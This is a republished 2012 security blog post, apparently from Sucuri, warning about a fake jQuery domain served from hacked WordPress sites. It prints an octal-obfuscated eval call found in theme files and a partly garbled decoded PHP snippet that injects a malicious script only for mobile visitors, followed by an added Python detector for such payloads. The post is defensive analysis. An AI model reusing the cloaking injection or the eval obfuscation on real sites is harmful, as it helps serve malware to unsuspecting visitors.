Careful With Fake jQuery Website – jquery-framework. com

A few days ago we posted in our Labs notes about a fake jQuery website that is distributing malware. The domain was carefully chosen to confuse end users ( ), since it looks like a valid site.

This is what we were seeing injected on some websites:

<script src="httx://

Some people have even complained to us that we’re flagging jQuery by mistake. However, when you visit that page you see that it does not have the jQuery code, just a redirection to

window.location = "";

Which then redirects the browser to additional malicious domains. This is the full path: -> -> ->

or -> -> -> ->

Compromised WordPress sites

Since we first saw this and posted it in our Labs notes, we have seen even more websites compromised with it (mostly running outdated WordPress). We had the chance to analyze some of them, and they used the following eval code to hide the malware (inside the theme files):

eval ("\145\166\141\154\050\142 .. \141\163\145\066\064\137")

When decoded, it executes the following:

if ((preg_match('/text/vnd.wap.wml|application/vnd.wap.xhtml+xml/si', @$_SERVER['HTTP_ACCEPT']) ||
vodafone|wap|webos|wireless|xda|xoom|zte/si', @$_SERVER['HTTP_USER_AGENT']) || 
       preg_match('/msearch|m?q=/si', @$_SERVER['HTTP_REFERER'])) && 
@$_SERVER['HTTP_USER_AGENT'])) { echo "<script src="httx://"..'; 
exit; }

If you are not familiar with PHP, this code checks whether you are visiting the site from a mobile device (iPod, iPad, iPhone, etc.) and, if you are, it inserts the script on the site. Since Google (and other AV blacklists) aren’t flagging this domain, users will receive no warning of what is happening.
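As an added example (not part of the original post and not Sucuri's scanner), the Python below looks for the hiding technique described above in theme files: an eval() whose argument is a double-quoted PHP string built from octal escapes. It decodes the escapes so the hidden call can be read without running it. The function names, the min_escapes threshold and the sample file are assumptions made for illustration.

```python
import base64
import re

# PHP expands \NNN (octal) and \xHH (hex) escapes only inside double-quoted strings.
_ESCAPE = re.compile(r"\\([0-7]{1,3})|\\x([0-9A-Fa-f]{1,2})")
# eval( "..." ) where the argument starts with a double-quoted literal.
_EVAL_STR = re.compile(r'\beval\s*\(\s*"((?:\\.|[^"\\])*)"', re.I | re.S)
_NESTED = re.compile(r"\b(?:eval|assert|base64_decode|gzinflate)\s*\(", re.I)
_B64_ARG = re.compile(r"base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=]+)['\"]", re.I)


def decode_php_escapes(literal):
    """Expand octal/hex escapes the way PHP would in a double-quoted string."""
    def expand(m):
        if m.group(1) is not None:
            return chr(int(m.group(1), 8) & 0xFF)  # PHP wraps octal values above \377
        return chr(int(m.group(2), 16))
    return _ESCAPE.sub(expand, literal)


def scan_php_source(text, min_escapes=4):
    """Return one finding per eval("...") whose literal is built from escapes."""
    findings = []
    for m in _EVAL_STR.finditer(text):
        literal = m.group(1)
        escapes = sum(1 for _ in _ESCAPE.finditer(literal))
        if escapes < min_escapes:  # assumed threshold: ordinary code rarely needs this many
            continue
        decoded = decode_php_escapes(literal)
        inner = _B64_ARG.search(decoded)
        try:
            payload = base64.b64decode(inner.group(1)).decode("latin-1") if inner else None
        except ValueError:
            payload = None  # truncated or non-base64 argument
        findings.append({"line": text.count("\n", 0, m.start()) + 1, "decoded": decoded,
                         "nested_call": bool(_NESTED.search(decoded)), "payload": payload})
    return findings


# Constructed sample theme file: a harmless "echo 1;" hidden the same way.
SAMPLE = r'''<?php
get_header();
eval ("\145\166\141\154\050\142\141\163\145\066\064\137\144\145\143\157\144\145\050'ZWNobyAxOw=='\051\051\073");
eval("return 1;");
'''

if __name__ == "__main__":
    for finding in scan_php_source(SAMPLE):
        print(finding)
```

Run over each .php file in a theme directory, a finding with nested_call set deserves a manual look; the ordinary eval("return 1;") in the sample is not reported.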

We’re definitely flagging it. Scan your site for free using Sucuri SiteCheck to make sure you’re good to go.

Read more: Careful With Fake jQuery Website – jquery-framework. com


Story added 17. September 2012, content source with full text you can find at link above.